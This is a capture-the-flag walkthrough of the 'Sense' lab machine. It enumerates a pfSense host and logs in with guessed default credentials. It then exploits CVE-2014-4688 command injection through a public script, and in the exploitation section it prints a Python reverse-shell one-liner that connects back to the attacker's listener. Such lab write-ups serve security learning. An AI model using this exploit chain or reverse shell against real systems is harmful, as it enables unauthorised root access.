# Sense

## Service Enumeration

`nmapAutomator.sh -H 10.10.10.60 -t all`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadtxAQJa_x_PHbCkN2%2Fd8018fada8cb47bebb120004c84fea59.png?alt=media\&token=6690c8ba-2906-4f4c-88bb-573fbce72cee)

There is a web service running on standard ports.

It turns out to be a pfSense login page.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madtzz676cgA0Z4KQQz%2F28518b79313540228a42c30eb2b2ca7c.png?alt=media\&token=e1e68c30-5f65-41c8-ac79-b9f0710426d3)

The initial subdirectory enumeration did not yield anything interesting. If we look for `.txt` and `.php` files, however, we find some more interesting files.

`gobuster dir -u https://10.10.10.60 -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu1ZqlrXhFKHxkJZw%2F1a9d66d2db7e4722a6dc3942c6424f7e.png?alt=media\&token=a9a8447d-3294-488a-b74f-ff4672fe6981)

The PHP pages all just load the login page.

However, we find a `changelog.txt`:

```
# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window
```

Using a longer wordlist, `/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt`, we find another `.txt` file, `system-users.txt`.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu4ZGrplWIJAwI_3n%2Fe937d8f73a0d4b12a0f4ed37e44f095e.png?alt=media\&token=b755e6c6-4907-4cf7-af84-a9fa5ef48c77)

```
####Support ticket###

Please create the following user


username: Rohit
password: company defaults
```

## Exploitation

The default pfSense credentials, `admin:pfsense`, do not work. However, the `system-users.txt` file above indicated that a `Rohit` user exists with the "company default" password.

Using the credentials `rohit:pfsense`, we successfully authenticate into the web application.

Once logged in, the dashboard shows the pfSense version.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu70-twPo0M7F9IBu%2F0f286e416183428f9bce07e7c2a00be0.png?alt=media\&token=38a379c4-c76a-40c8-b6db-7a95e0eb60cb)

This version is vulnerable to CVE-2014-4688, a command injection vulnerability.

Using code from <https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py>, we can exploit the vulnerability.

Edit the script's configuration variables to match our setup:

```python
username = "rohit"           # pfSense web GUI user found in system-users.txt
password = "pfsense"         # the "company default" password
listener_ip = "10.10.14.23"  # our machine, where the reverse shell connects back
listener_port = "4444"       # port our listener is waiting on
target_ip = "10.10.10.60"    # the pfSense host
```

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu9PzPn5FhAzvhe6Y%2Fe9f5613fb4bd459381238127554b7273.png?alt=media\&token=0b2681d9-29e9-4d28-8181-726dfb139d73)

The web service runs as root, so the shell we receive is a root shell.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MaduC66GH2TanFovqFP%2Fdb264aad507c418d94d19ce98dd90a1b.png?alt=media\&token=8ab61416-1e90-4afd-9a46-6254dae3cb10)

To upgrade to an interactive shell, we run a Python reverse shell from the initial shell and catch it with a listener on another terminal (port 4242 here):

`export RHOST="10.10.14.23";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MaduEa6-sbFkLBUHWPg%2F2008b54a67ea4b0686b31344ee954655.png?alt=media\&token=dd5630ac-afcd-40ee-a02b-e871c173111f)
